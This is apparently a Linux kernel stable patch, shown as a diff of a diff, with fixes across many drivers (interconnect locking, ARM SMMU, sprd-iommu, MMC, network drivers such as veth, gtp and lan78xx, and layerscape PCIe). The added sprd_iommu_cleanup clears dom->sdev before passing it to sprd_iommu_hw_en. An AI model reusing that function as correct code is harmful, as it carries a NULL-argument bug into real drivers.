+-	    intf->cur_altsetting->desc.bInterfaceNumber != 0) {
++	    intf->cur_altsetting->desc.bInterfaceNumber != GIP_WIRED_INTF_DATA) {
+ 		/*
+ 		 * The Xbox One controller lists three interfaces all with the
+ 		 * same interface class, subclass and protocol. Differentiate by
+diff --git a/drivers/interconnect/core.c b/drivers/interconnect/core.c
+index 1d9494f64a215..4526ff2e1bd5f 100644
+--- a/drivers/interconnect/core.c
++++ b/drivers/interconnect/core.c
+@@ -29,7 +29,6 @@ static LIST_HEAD(icc_providers);
+ static int providers_count;
+ static bool synced_state;
+ static DEFINE_MUTEX(icc_lock);
+-static DEFINE_MUTEX(icc_bw_lock);
+ static struct dentry *icc_debugfs_dir;
+ 
+ static void icc_summary_show_one(struct seq_file *s, struct icc_node *n)
+@@ -636,7 +635,7 @@ int icc_set_bw(struct icc_path *path, u32 avg_bw, u32 peak_bw)
+ 	if (WARN_ON(IS_ERR(path) || !path->num_nodes))
+ 		return -EINVAL;
+ 
+-	mutex_lock(&icc_bw_lock);
++	mutex_lock(&icc_lock);
+ 
+ 	old_avg = path->reqs[0].avg_bw;
+ 	old_peak = path->reqs[0].peak_bw;
+@@ -668,7 +667,7 @@ int icc_set_bw(struct icc_path *path, u32 avg_bw, u32 peak_bw)
+ 		apply_constraints(path);
+ 	}
+ 
+-	mutex_unlock(&icc_bw_lock);
++	mutex_unlock(&icc_lock);
+ 
+ 	trace_icc_set_bw_end(path, ret);
+ 
+@@ -971,7 +970,6 @@ void icc_node_add(struct icc_node *node, struct icc_provider *provider)
+ 		return;
+ 
+ 	mutex_lock(&icc_lock);
+-	mutex_lock(&icc_bw_lock);
+ 
+ 	node->provider = provider;
+ 	list_add_tail(&node->node_list, &provider->nodes);
+@@ -997,7 +995,6 @@ void icc_node_add(struct icc_node *node, struct icc_provider *provider)
+ 	node->avg_bw = 0;
+ 	node->peak_bw = 0;
+ 
+-	mutex_unlock(&icc_bw_lock);
+ 	mutex_unlock(&icc_lock);
+ }
+ EXPORT_SYMBOL_GPL(icc_node_add);
+@@ -1137,7 +1134,6 @@ void icc_sync_state(struct device *dev)
+ 		return;
+ 
+ 	mutex_lock(&icc_lock);
+-	mutex_lock(&icc_bw_lock);
+ 	synced_state = true;
+ 	list_for_each_entry(p, &icc_providers, provider_list) {
+ 		dev_dbg(p->dev, "interconnect provider is in synced state\n");
+@@ -1150,21 +1146,13 @@ void icc_sync_state(struct device *dev)
+ 			}
+ 		}
+ 	}
+-	mutex_unlock(&icc_bw_lock);
+ 	mutex_unlock(&icc_lock);
+ }
+ EXPORT_SYMBOL_GPL(icc_sync_state);
+ 
+ static int __init icc_init(void)
+ {
+-	struct device_node *root;
+-
+-	/* Teach lockdep about lock ordering wrt. shrinker: */
+-	fs_reclaim_acquire(GFP_KERNEL);
+-	might_lock(&icc_bw_lock);
+-	fs_reclaim_release(GFP_KERNEL);
+-
+-	root = of_find_node_by_path("/");
++	struct device_node *root = of_find_node_by_path("/");
+ 
+ 	providers_count = of_count_icc_providers(root);
+ 	of_node_put(root);
+diff --git a/drivers/iommu/arm/arm-smmu-v3/arm-smmu-v3.c b/drivers/iommu/arm/arm-smmu-v3/arm-smmu-v3.c
+index 8966f7d5aab61..82f100e591b5a 100644
+--- a/drivers/iommu/arm/arm-smmu-v3/arm-smmu-v3.c
++++ b/drivers/iommu/arm/arm-smmu-v3/arm-smmu-v3.c
+@@ -152,6 +152,18 @@ static void queue_inc_cons(struct arm_smmu_ll_queue *q)
+ 	q->cons = Q_OVF(q->cons) | Q_WRP(q, cons) | Q_IDX(q, cons);
+ }
+ 
++static void queue_sync_cons_ovf(struct arm_smmu_queue *q)
++{
++	struct arm_smmu_ll_queue *llq = &q->llq;
++
++	if (likely(Q_OVF(llq->prod) == Q_OVF(llq->cons)))
++		return;
++
++	llq->cons = Q_OVF(llq->prod) | Q_WRP(llq, llq->cons) |
++		      Q_IDX(llq, llq->cons);
++	queue_sync_cons_out(q);
++}
++
+ static int queue_sync_prod_in(struct arm_smmu_queue *q)
+ {
+ 	u32 prod;
+@@ -1583,8 +1595,7 @@ static irqreturn_t arm_smmu_evtq_thread(int irq, void *dev)
+ 	} while (!queue_empty(llq));
+ 
+ 	/* Sync our overflow flag, as we believe we're up to speed */
+-	llq->cons = Q_OVF(llq->prod) | Q_WRP(llq, llq->cons) |
+-		    Q_IDX(llq, llq->cons);
++	queue_sync_cons_ovf(q);
+ 	return IRQ_HANDLED;
+ }
+ 
+@@ -1642,9 +1653,7 @@ static irqreturn_t arm_smmu_priq_thread(int irq, void *dev)
+ 	} while (!queue_empty(llq));
+ 
+ 	/* Sync our overflow flag, as we believe we're up to speed */
+-	llq->cons = Q_OVF(llq->prod) | Q_WRP(llq, llq->cons) |
+-		      Q_IDX(llq, llq->cons);
+-	queue_sync_cons_out(q);
++	queue_sync_cons_ovf(q);
+ 	return IRQ_HANDLED;
+ }
+ 
+diff --git a/drivers/iommu/arm/arm-smmu/arm-smmu-qcom.c b/drivers/iommu/arm/arm-smmu/arm-smmu-qcom.c
+index d80065c8105af..f15dcb9e4175c 100644
+--- a/drivers/iommu/arm/arm-smmu/arm-smmu-qcom.c
++++ b/drivers/iommu/arm/arm-smmu/arm-smmu-qcom.c
+@@ -267,12 +267,26 @@ static int qcom_smmu_init_context(struct arm_smmu_domain *smmu_domain,
+ 
+ static int qcom_smmu_cfg_probe(struct arm_smmu_device *smmu)
+ {
+-	unsigned int last_s2cr = ARM_SMMU_GR0_S2CR(smmu->num_mapping_groups - 1);
+ 	struct qcom_smmu *qsmmu = to_qcom_smmu(smmu);
++	unsigned int last_s2cr;
+ 	u32 reg;
+ 	u32 smr;
+ 	int i;
+ 
++	/*
++	 * Some platforms support more than the Arm SMMU architected maximum of
++	 * 128 stream matching groups. For unknown reasons, the additional
++	 * groups don't exhibit the same behavior as the architected registers,
++	 * so limit the groups to 128 until the behavior is fixed for the other
++	 * groups.
++	 */
++	if (smmu->num_mapping_groups > 128) {
++		dev_notice(smmu->dev, "\tLimiting the stream matching groups to 128\n");
++		smmu->num_mapping_groups = 128;
++	}
++
++	last_s2cr = ARM_SMMU_GR0_S2CR(smmu->num_mapping_groups - 1);
++
+ 	/*
+ 	 * With some firmware versions writes to S2CR of type FAULT are
+ 	 * ignored, and writing BYPASS will end up written as FAULT in the
+diff --git a/drivers/iommu/sprd-iommu.c b/drivers/iommu/sprd-iommu.c
+index 8261066de07d7..e4358393fe378 100644
+--- a/drivers/iommu/sprd-iommu.c
++++ b/drivers/iommu/sprd-iommu.c
+@@ -152,13 +152,6 @@ static struct iommu_domain *sprd_iommu_domain_alloc(unsigned int domain_type)
+ 	return &dom->domain;
+ }
+ 
+-static void sprd_iommu_domain_free(struct iommu_domain *domain)
+-{
+-	struct sprd_iommu_domain *dom = to_sprd_domain(domain);
+-
+-	kfree(dom);
+-}
+-
+ static void sprd_iommu_first_vpn(struct sprd_iommu_domain *dom)
+ {
+ 	struct sprd_iommu_device *sdev = dom->sdev;
+@@ -231,6 +224,28 @@ static void sprd_iommu_hw_en(struct sprd_iommu_device *sdev, bool en)
+ 	sprd_iommu_update_bits(sdev, reg_cfg, mask, 0, val);
+ }
+ 
++static void sprd_iommu_cleanup(struct sprd_iommu_domain *dom)
++{
++	size_t pgt_size;
++
++	/* Nothing need to do if the domain hasn't been attached */
++	if (!dom->sdev)
++		return;
++
++	pgt_size = sprd_iommu_pgt_size(&dom->domain);
++	dma_free_coherent(dom->sdev->dev, pgt_size, dom->pgt_va, dom->pgt_pa);
++	dom->sdev = NULL;
++	sprd_iommu_hw_en(dom->sdev, false);
++}
++
++static void sprd_iommu_domain_free(struct iommu_domain *domain)
++{
++	struct sprd_iommu_domain *dom = to_sprd_domain(domain);
++
++	sprd_iommu_cleanup(dom);
++	kfree(dom);
++}
++
+ static int sprd_iommu_attach_device(struct iommu_domain *domain,
+ 				    struct device *dev)
+ {
+diff --git a/drivers/mmc/core/mmc.c b/drivers/mmc/core/mmc.c
+index a46ce0868fe1f..3a927452a6501 100644
+--- a/drivers/mmc/core/mmc.c
++++ b/drivers/mmc/core/mmc.c
+@@ -1007,10 +1007,12 @@ static int mmc_select_bus_width(struct mmc_card *card)
+ 	static unsigned ext_csd_bits[] = {
+ 		EXT_CSD_BUS_WIDTH_8,
+ 		EXT_CSD_BUS_WIDTH_4,
++		EXT_CSD_BUS_WIDTH_1,
+ 	};
+ 	static unsigned bus_widths[] = {
+ 		MMC_BUS_WIDTH_8,
+ 		MMC_BUS_WIDTH_4,
++		MMC_BUS_WIDTH_1,
+ 	};
+ 	struct mmc_host *host = card->host;
+ 	unsigned idx, bus_width = 0;
+diff --git a/drivers/mmc/host/mmci_stm32_sdmmc.c b/drivers/mmc/host/mmci_stm32_sdmmc.c
+index 60bca78a72b19..0511583ffa764 100644
+--- a/drivers/mmc/host/mmci_stm32_sdmmc.c
++++ b/drivers/mmc/host/mmci_stm32_sdmmc.c
+@@ -200,6 +200,8 @@ static int sdmmc_idma_start(struct mmci_host *host, unsigned int *datactrl)
+ 	struct scatterlist *sg;
+ 	int i;
+ 
++	host->dma_in_progress = true;
++
+ 	if (!host->variant->dma_lli || data->sg_len == 1 ||
+ 	    idma->use_bounce_buffer) {
+ 		u32 dma_addr;
+@@ -238,9 +240,30 @@ static int sdmmc_idma_start(struct mmci_host *host, unsigned int *datactrl)
+ 	return 0;
+ }
+ 
++static void sdmmc_idma_error(struct mmci_host *host)
++{
++	struct mmc_data *data = host->data;
++	struct sdmmc_idma *idma = host->dma_priv;
++
++	if (!dma_inprogress(host))
++		return;
++
++	writel_relaxed(0, host->base + MMCI_STM32_IDMACTRLR);
++	host->dma_in_progress = false;
++	data->host_cookie = 0;
++
++	if (!idma->use_bounce_buffer)
++		dma_unmap_sg(mmc_dev(host->mmc), data->sg, data->sg_len,
++			     mmc_get_dma_dir(data));
++}
++
+ static void sdmmc_idma_finalize(struct mmci_host *host, struct mmc_data *data)
+ {
++	if (!dma_inprogress(host))
++		return;
++
+ 	writel_relaxed(0, host->base + MMCI_STM32_IDMACTRLR);
++	host->dma_in_progress = false;
+ 
+ 	if (!data->host_cookie)
+ 		sdmmc_idma_unprep_data(host, data, 0);
+@@ -567,6 +590,7 @@ static struct mmci_host_ops sdmmc_variant_ops = {
+ 	.dma_setup = sdmmc_idma_setup,
+ 	.dma_start = sdmmc_idma_start,
+ 	.dma_finalize = sdmmc_idma_finalize,
++	.dma_error = sdmmc_idma_error,
+ 	.set_clkreg = mmci_sdmmc_set_clkreg,
+ 	.set_pwrreg = mmci_sdmmc_set_pwrreg,
+ 	.busy_complete = sdmmc_busy_complete,
+diff --git a/drivers/mmc/host/sdhci-xenon-phy.c b/drivers/mmc/host/sdhci-xenon-phy.c
+index 8cf3a375de659..cc9d28b75eb91 100644
+--- a/drivers/mmc/host/sdhci-xenon-phy.c
++++ b/drivers/mmc/host/sdhci-xenon-phy.c
+@@ -11,6 +11,7 @@
+ #include <linux/slab.h>
+ #include <linux/delay.h>
+ #include <linux/ktime.h>
++#include <linux/iopoll.h>
+ #include <linux/of_address.h>
+ 
+ #include "sdhci-pltfm.h"
+@@ -109,6 +110,8 @@
+ #define XENON_EMMC_PHY_LOGIC_TIMING_ADJUST	(XENON_EMMC_PHY_REG_BASE + 0x18)
+ #define XENON_LOGIC_TIMING_VALUE		0x00AA8977
+ 
++#define XENON_MAX_PHY_TIMEOUT_LOOPS		100
++
+ /*
+  * List offset of PHY registers and some special register values
+  * in eMMC PHY 5.0 or eMMC PHY 5.1
+@@ -216,6 +219,19 @@ static int xenon_alloc_emmc_phy(struct sdhci_host *host)
+ 	return 0;
+ }
+ 
++static int xenon_check_stability_internal_clk(struct sdhci_host *host)
++{
++	u32 reg;
++	int err;
++
++	err = read_poll_timeout(sdhci_readw, reg, reg & SDHCI_CLOCK_INT_STABLE,
++				1100, 20000, false, host, SDHCI_CLOCK_CONTROL);
++	if (err)
++		dev_err(mmc_dev(host->mmc), "phy_init: Internal clock never stabilized.\n");
++
++	return err;
++}
++
+ /*
+  * eMMC 5.0/5.1 PHY init/re-init.
+  * eMMC PHY init should be executed after:
+@@ -232,6 +248,11 @@ static int xenon_emmc_phy_init(struct sdhci_host *host)
+ 	struct xenon_priv *priv = sdhci_pltfm_priv(pltfm_host);
+ 	struct xenon_emmc_phy_regs *phy_regs = priv->emmc_phy_regs;
+ 
++	int ret = xenon_check_stability_internal_clk(host);
++
++	if (ret)
++		return ret;
++
+ 	reg = sdhci_readl(host, phy_regs->timing_adj);
+ 	reg |= XENON_PHY_INITIALIZAION;
+ 	sdhci_writel(host, reg, phy_regs->timing_adj);
+@@ -259,18 +280,27 @@ static int xenon_emmc_phy_init(struct sdhci_host *host)
+ 	/* get the wait time */
+ 	wait /= clock;
+ 	wait++;
+-	/* wait for host eMMC PHY init completes */
+-	udelay(wait);
+ 
+-	reg = sdhci_readl(host, phy_regs->timing_adj);
+-	reg &= XENON_PHY_INITIALIZAION;
+-	if (reg) {
++	/*
++	 * AC5X spec says bit must be polled until zero.
++	 * We see cases in which timeout can take longer
++	 * than the standard calculation on AC5X, which is
++	 * expected following the spec comment above.
++	 * According to the spec, we must wait as long as
++	 * it takes for that bit to toggle on AC5X.
++	 * Cap that with 100 delay loops so we won't get
++	 * stuck here forever:
++	 */
++
++	ret = read_poll_timeout(sdhci_readl, reg,
++				!(reg & XENON_PHY_INITIALIZAION),
++				wait, XENON_MAX_PHY_TIMEOUT_LOOPS * wait,
++				false, host, phy_regs->timing_adj);
++	if (ret)
+ 		dev_err(mmc_dev(host->mmc), "eMMC PHY init cannot complete after %d us\n",
+-			wait);
+-		return -ETIMEDOUT;
+-	}
++			wait * XENON_MAX_PHY_TIMEOUT_LOOPS);
+ 
+-	return 0;
++	return ret;
+ }
+ 
+ #define ARMADA_3700_SOC_PAD_1_8V	0x1
+diff --git a/drivers/mtd/nand/spi/gigadevice.c b/drivers/mtd/nand/spi/gigadevice.c
+index 6b043e24855fb..9116ee7f023ed 100644
+--- a/drivers/mtd/nand/spi/gigadevice.c
++++ b/drivers/mtd/nand/spi/gigadevice.c
+@@ -186,7 +186,7 @@ static int gd5fxgq4uexxg_ecc_get_status(struct spinand_device *spinand,
+ {
+ 	u8 status2;
+ 	struct spi_mem_op op = SPINAND_GET_FEATURE_OP(GD5FXGQXXEXXG_REG_STATUS2,
+-						      &status2);
++						      spinand->scratchbuf);
+ 	int ret;
+ 
+ 	switch (status & STATUS_ECC_MASK) {
+@@ -207,6 +207,7 @@ static int gd5fxgq4uexxg_ecc_get_status(struct spinand_device *spinand,
+ 		 * report the maximum of 4 in this case
+ 		 */
+ 		/* bits sorted this way (3...0): ECCS1,ECCS0,ECCSE1,ECCSE0 */
++		status2 = *(spinand->scratchbuf);
+ 		return ((status & STATUS_ECC_MASK) >> 2) |
+ 			((status2 & STATUS_ECC_MASK) >> 4);
+ 
+@@ -228,7 +229,7 @@ static int gd5fxgq5xexxg_ecc_get_status(struct spinand_device *spinand,
+ {
+ 	u8 status2;
+ 	struct spi_mem_op op = SPINAND_GET_FEATURE_OP(GD5FXGQXXEXXG_REG_STATUS2,
+-						      &status2);
++						      spinand->scratchbuf);
+ 	int ret;
+ 
+ 	switch (status & STATUS_ECC_MASK) {
+@@ -248,6 +249,7 @@ static int gd5fxgq5xexxg_ecc_get_status(struct spinand_device *spinand,
+ 		 * 1 ... 4 bits are flipped (and corrected)
+ 		 */
+ 		/* bits sorted this way (1...0): ECCSE1, ECCSE0 */
++		status2 = *(spinand->scratchbuf);
+ 		return ((status2 & STATUS_ECC_MASK) >> 4) + 1;
+ 
+ 	case STATUS_ECC_UNCOR_ERROR:
+diff --git a/drivers/net/ethernet/Kconfig b/drivers/net/ethernet/Kconfig
+index 1917da7841919..5a274b99f2992 100644
+--- a/drivers/net/ethernet/Kconfig
++++ b/drivers/net/ethernet/Kconfig
+@@ -84,7 +84,6 @@ source "drivers/net/ethernet/huawei/Kconfig"
+ source "drivers/net/ethernet/i825xx/Kconfig"
+ source "drivers/net/ethernet/ibm/Kconfig"
+ source "drivers/net/ethernet/intel/Kconfig"
+-source "drivers/net/ethernet/wangxun/Kconfig"
+ source "drivers/net/ethernet/xscale/Kconfig"
+ 
+ config JME
+@@ -189,6 +188,7 @@ source "drivers/net/ethernet/toshiba/Kconfig"
+ source "drivers/net/ethernet/tundra/Kconfig"
+ source "drivers/net/ethernet/vertexcom/Kconfig"
+ source "drivers/net/ethernet/via/Kconfig"
++source "drivers/net/ethernet/wangxun/Kconfig"
+ source "drivers/net/ethernet/wiznet/Kconfig"
+ source "drivers/net/ethernet/xilinx/Kconfig"
+ source "drivers/net/ethernet/xircom/Kconfig"
+diff --git a/drivers/net/ethernet/intel/igb/igb_ptp.c b/drivers/net/ethernet/intel/igb/igb_ptp.c
+index 07171e574e7d7..36e62197fba0b 100644
+--- a/drivers/net/ethernet/intel/igb/igb_ptp.c
++++ b/drivers/net/ethernet/intel/igb/igb_ptp.c
+@@ -976,7 +976,7 @@ static void igb_ptp_tx_hwtstamp(struct igb_adapter *adapter)
+ 
+ 	igb_ptp_systim_to_hwtstamp(adapter, &shhwtstamps, regval);
+ 	/* adjust timestamp for the TX latency based on link speed */
+-	if (adapter->hw.mac.type == e1000_i210) {
++	if (hw->mac.type == e1000_i210 || hw->mac.type == e1000_i211) {
+ 		switch (adapter->link_speed) {
+ 		case SPEED_10:
+ 			adjust = IGB_I210_TX_LATENCY_10;
+@@ -1022,6 +1022,7 @@ int igb_ptp_rx_pktstamp(struct igb_q_vector *q_vector, void *va,
+ 			ktime_t *timestamp)
+ {
+ 	struct igb_adapter *adapter = q_vector->adapter;
++	struct e1000_hw *hw = &adapter->hw;
+ 	struct skb_shared_hwtstamps ts;
+ 	__le64 *regval = (__le64 *)va;
+ 	int adjust = 0;
+@@ -1041,7 +1042,7 @@ int igb_ptp_rx_pktstamp(struct igb_q_vector *q_vector, void *va,
+ 	igb_ptp_systim_to_hwtstamp(adapter, &ts, le64_to_cpu(regval[1]));
+ 
+ 	/* adjust timestamp for the RX latency based on link speed */
+-	if (adapter->hw.mac.type == e1000_i210) {
++	if (hw->mac.type == e1000_i210 || hw->mac.type == e1000_i211) {
+ 		switch (adapter->link_speed) {
+ 		case SPEED_10:
+ 			adjust = IGB_I210_RX_LATENCY_10;
+diff --git a/drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_tcam.c b/drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_tcam.c
+index dc2e204bcd727..41eac7dfb67e7 100644
+--- a/drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_tcam.c
++++ b/drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_tcam.c
+@@ -52,8 +52,10 @@ int mlxsw_sp_acl_tcam_init(struct mlxsw_sp *mlxsw_sp,
+ 		max_regions = max_tcam_regions;
+ 
+ 	tcam->used_regions = bitmap_zalloc(max_regions, GFP_KERNEL);
+-	if (!tcam->used_regions)
+-		return -ENOMEM;
++	if (!tcam->used_regions) {
++		err = -ENOMEM;
++		goto err_alloc_used_regions;
++	}
+ 	tcam->max_regions = max_regions;
+ 
+ 	max_groups = MLXSW_CORE_RES_GET(mlxsw_sp->core, ACL_MAX_GROUPS);
+@@ -78,6 +80,8 @@ int mlxsw_sp_acl_tcam_init(struct mlxsw_sp *mlxsw_sp,
+ 	bitmap_free(tcam->used_groups);
+ err_alloc_used_groups:
+ 	bitmap_free(tcam->used_regions);
++err_alloc_used_regions:
++	mutex_destroy(&tcam->lock);
+ 	return err;
+ }
+ 
+@@ -86,10 +90,10 @@ void mlxsw_sp_acl_tcam_fini(struct mlxsw_sp *mlxsw_sp,
+ {
+ 	const struct mlxsw_sp_acl_tcam_ops *ops = mlxsw_sp->acl_tcam_ops;
+ 
+-	mutex_destroy(&tcam->lock);
+ 	ops->fini(mlxsw_sp, tcam->priv);
+ 	bitmap_free(tcam->used_groups);
+ 	bitmap_free(tcam->used_regions);
++	mutex_destroy(&tcam->lock);
+ }
+ 
+ int mlxsw_sp_acl_tcam_priority_get(struct mlxsw_sp *mlxsw_sp,
+diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+index 91b2aa81914ba..e2d51014ab4bc 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
++++ b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+@@ -3900,8 +3900,10 @@ static void stmmac_fpe_stop_wq(struct stmmac_priv *priv)
+ {
+ 	set_bit(__FPE_REMOVING, &priv->fpe_task_state);
+ 
+-	if (priv->fpe_wq)
++	if (priv->fpe_wq) {
+ 		destroy_workqueue(priv->fpe_wq);
++		priv->fpe_wq = NULL;
++	}
+ 
+ 	netdev_info(priv->dev, "FPE workqueue stop");
+ }
+diff --git a/drivers/net/gtp.c b/drivers/net/gtp.c
+index 937dd9cf4fbaf..7086acfed5b90 100644
+--- a/drivers/net/gtp.c
++++ b/drivers/net/gtp.c
+@@ -1902,26 +1902,26 @@ static int __init gtp_init(void)
+ 
+ 	get_random_bytes(&gtp_h_initval, sizeof(gtp_h_initval));
+ 
+-	err = rtnl_link_register(&gtp_link_ops);
++	err = register_pernet_subsys(&gtp_net_ops);
+ 	if (err < 0)
+ 		goto error_out;
+ 
+-	err = register_pernet_subsys(&gtp_net_ops);
++	err = rtnl_link_register(&gtp_link_ops);
+ 	if (err < 0)
+-		goto unreg_rtnl_link;
++		goto unreg_pernet_subsys;
+ 
+ 	err = genl_register_family(&gtp_genl_family);
+ 	if (err < 0)
+-		goto unreg_pernet_subsys;
++		goto unreg_rtnl_link;
+ 
+ 	pr_info("GTP module loaded (pdp ctx size %zd bytes)\n",
+ 		sizeof(struct pdp_ctx));
+ 	return 0;
+ 
+-unreg_pernet_subsys:
+-	unregister_pernet_subsys(&gtp_net_ops);
+ unreg_rtnl_link:
+ 	rtnl_link_unregister(&gtp_link_ops);
++unreg_pernet_subsys:
++	unregister_pernet_subsys(&gtp_net_ops);
+ error_out:
+ 	pr_err("error loading GTP module loaded\n");
+ 	return err;
+diff --git a/drivers/net/tun.c b/drivers/net/tun.c
+index 367255bb44cdc..922d6f16d99d1 100644
+--- a/drivers/net/tun.c
++++ b/drivers/net/tun.c
+@@ -653,6 +653,7 @@ static void __tun_detach(struct tun_file *tfile, bool clean)
+ 				   tun->tfiles[tun->numqueues - 1]);
+ 		ntfile = rtnl_dereference(tun->tfiles[index]);
+ 		ntfile->queue_index = index;
++		ntfile->xdp_rxq.queue_index = index;
+ 		rcu_assign_pointer(tun->tfiles[tun->numqueues - 1],
+ 				   NULL);
+ 
+diff --git a/drivers/net/usb/dm9601.c b/drivers/net/usb/dm9601.c
+index 99ec1d4a972db..8b6d6a1b3c2ec 100644
+--- a/drivers/net/usb/dm9601.c
++++ b/drivers/net/usb/dm9601.c
+@@ -232,7 +232,7 @@ static int dm9601_mdio_read(struct net_device *netdev, int phy_id, int loc)
+ 	err = dm_read_shared_word(dev, 1, loc, &res);
+ 	if (err < 0) {
+ 		netdev_err(dev->net, "MDIO read error: %d\n", err);
+-		return err;
++		return 0;
+ 	}
+ 
+ 	netdev_dbg(dev->net,
+diff --git a/drivers/net/usb/lan78xx.c b/drivers/net/usb/lan78xx.c
+index c458c030fadf6..4fd4563811299 100644
+--- a/drivers/net/usb/lan78xx.c
++++ b/drivers/net/usb/lan78xx.c
+@@ -1501,7 +1501,9 @@ static int lan78xx_link_reset(struct lan78xx_net *dev)
+ 
+ 		lan78xx_rx_urb_submit_all(dev);
+ 
++		local_bh_disable();
+ 		napi_schedule(&dev->napi);
++		local_bh_enable();
+ 	}
+ 
+ 	return 0;
+@@ -3035,7 +3037,8 @@ static int lan78xx_reset(struct lan78xx_net *dev)
+ 	if (dev->chipid == ID_REV_CHIP_ID_7801_)
+ 		buf &= ~MAC_CR_GMII_EN_;
+ 
+-	if (dev->chipid == ID_REV_CHIP_ID_7800_) {
++	if (dev->chipid == ID_REV_CHIP_ID_7800_ ||
++	    dev->chipid == ID_REV_CHIP_ID_7850_) {
+ 		ret = lan78xx_read_raw_eeprom(dev, 0, 1, &sig);
+ 		if (!ret && sig != EEPROM_INDICATOR) {
+ 			/* Implies there is no external eeprom. Set mac speed */
+diff --git a/drivers/net/veth.c b/drivers/net/veth.c
+index 36c5a41f84e44..dd9f5f1461921 100644
+--- a/drivers/net/veth.c
++++ b/drivers/net/veth.c
+@@ -1135,14 +1135,6 @@ static int veth_enable_xdp(struct net_device *dev)
+ 				veth_disable_xdp_range(dev, 0, dev->real_num_rx_queues, true);
+ 				return err;
+ 			}
+-
+-			if (!veth_gro_requested(dev)) {
+-				/* user-space did not require GRO, but adding XDP
+-				 * is supposed to get GRO working
+-				 */
+-				dev->features |= NETIF_F_GRO;
+-				netdev_features_change(dev);
+-			}
+ 		}
+ 	}
+ 
+@@ -1162,18 +1154,9 @@ static void veth_disable_xdp(struct net_device *dev)
+ 	for (i = 0; i < dev->real_num_rx_queues; i++)
+ 		rcu_assign_pointer(priv->rq[i].xdp_prog, NULL);
+ 
+-	if (!netif_running(dev) || !veth_gro_requested(dev)) {
++	if (!netif_running(dev) || !veth_gro_requested(dev))
+ 		veth_napi_del(dev);
+ 
+-		/* if user-space did not require GRO, since adding XDP
+-		 * enabled it, clear it now
+-		 */
+-		if (!veth_gro_requested(dev) && netif_running(dev)) {
+-			dev->features &= ~NETIF_F_GRO;
+-			netdev_features_change(dev);
+-		}
+-	}
+-
+ 	veth_disable_xdp_range(dev, 0, dev->real_num_rx_queues, false);
+ }
+ 
+@@ -1376,7 +1359,8 @@ static int veth_alloc_queues(struct net_device *dev)
+ 	struct veth_priv *priv = netdev_priv(dev);
+ 	int i;
+ 
+-	priv->rq = kcalloc(dev->num_rx_queues, sizeof(*priv->rq), GFP_KERNEL_ACCOUNT);
++	priv->rq = kvcalloc(dev->num_rx_queues, sizeof(*priv->rq),
++			    GFP_KERNEL_ACCOUNT | __GFP_RETRY_MAYFAIL);
+ 	if (!priv->rq)
+ 		return -ENOMEM;
+ 
+@@ -1392,7 +1376,7 @@ static void veth_free_queues(struct net_device *dev)
+ {
+ 	struct veth_priv *priv = netdev_priv(dev);
+ 
+-	kfree(priv->rq);
++	kvfree(priv->rq);
+ }
+ 
+ static int veth_dev_init(struct net_device *dev)
+@@ -1558,6 +1542,14 @@ static int veth_xdp_set(struct net_device *dev, struct bpf_prog *prog,
+ 		}
+ 
+ 		if (!old_prog) {
++			if (!veth_gro_requested(dev)) {
++				/* user-space did not require GRO, but adding
++				 * XDP is supposed to get GRO working
++				 */
++				dev->features |= NETIF_F_GRO;
++				netdev_features_change(dev);
++			}
++
+ 			peer->hw_features &= ~NETIF_F_GSO_SOFTWARE;
+ 			peer->max_mtu = max_mtu;
+ 		}
+@@ -1568,6 +1560,14 @@ static int veth_xdp_set(struct net_device *dev, struct bpf_prog *prog,
+ 			if (dev->flags & IFF_UP)
+ 				veth_disable_xdp(dev);
+ 
++			/* if user-space did not require GRO, since adding XDP
++			 * enabled it, clear it now
++			 */
++			if (!veth_gro_requested(dev)) {
++				dev->features &= ~NETIF_F_GRO;
++				netdev_features_change(dev);
++			}
++
+ 			if (peer) {
+ 				peer->hw_features |= NETIF_F_GSO_SOFTWARE;
+ 				peer->max_mtu = ETH_MAX_MTU;
+diff --git a/drivers/of/overlay.c b/drivers/of/overlay.c
+index 4402871b5c0c0..e663d5585a057 100644
+--- a/drivers/of/overlay.c
++++ b/drivers/of/overlay.c
+@@ -45,8 +45,8 @@ struct target {
+ 
+ /**
+  * struct fragment - info about fragment nodes in overlay expanded device tree
+- * @target:	target of the overlay operation
+  * @overlay:	pointer to the __overlay__ node
++ * @target:	target of the overlay operation
+  */
+ struct fragment {
+ 	struct device_node *overlay;
+diff --git a/drivers/of/property.c b/drivers/of/property.c
+index 33d5f16c81204..da5d712197704 100644
+--- a/drivers/of/property.c
++++ b/drivers/of/property.c
+@@ -1332,7 +1332,7 @@ static struct device_node *parse_remote_endpoint(struct device_node *np,
+ 						 int index)
+ {
+ 	/* Return NULL for index > 0 to signify end of remote-endpoints. */
+-	if (!index || strcmp(prop_name, "remote-endpoint"))
++	if (index > 0 || strcmp(prop_name, "remote-endpoint"))
+ 		return NULL;
+ 
+ 	return of_graph_get_remote_port_parent(np);
+diff --git a/drivers/pci/controller/dwc/pci-layerscape-ep.c b/drivers/pci/controller/dwc/pci-layerscape-ep.c
+index ad99707b3b994..dd7d74fecc48e 100644
+--- a/drivers/pci/controller/dwc/pci-layerscape-ep.c
++++ b/drivers/pci/controller/dwc/pci-layerscape-ep.c
+@@ -18,6 +18,20 @@
+ 
+ #include "pcie-designware.h"
+ 
++#define PEX_PF0_CONFIG			0xC0014
++#define PEX_PF0_CFG_READY		BIT(0)
++
++/* PEX PFa PCIE PME and message interrupt registers*/
++#define PEX_PF0_PME_MES_DR		0xC0020
++#define PEX_PF0_PME_MES_DR_LUD		BIT(7)
++#define PEX_PF0_PME_MES_DR_LDD		BIT(9)
++#define PEX_PF0_PME_MES_DR_HRD		BIT(10)
++
++#define PEX_PF0_PME_MES_IER		0xC0028
++#define PEX_PF0_PME_MES_IER_LUDIE	BIT(7)
++#define PEX_PF0_PME_MES_IER_LDDIE	BIT(9)
++#define PEX_PF0_PME_MES_IER_HRDIE	BIT(10)
++
+ #define to_ls_pcie_ep(x)	dev_get_drvdata((x)->dev)
+ 
+ struct ls_pcie_ep_drvdata {
+@@ -30,8 +44,99 @@ struct ls_pcie_ep {
+ 	struct dw_pcie			*pci;
+ 	struct pci_epc_features		*ls_epc;
+ 	const struct ls_pcie_ep_drvdata *drvdata;
++	int				irq;
++	u32				lnkcap;
++	bool				big_endian;
+ };
+ 
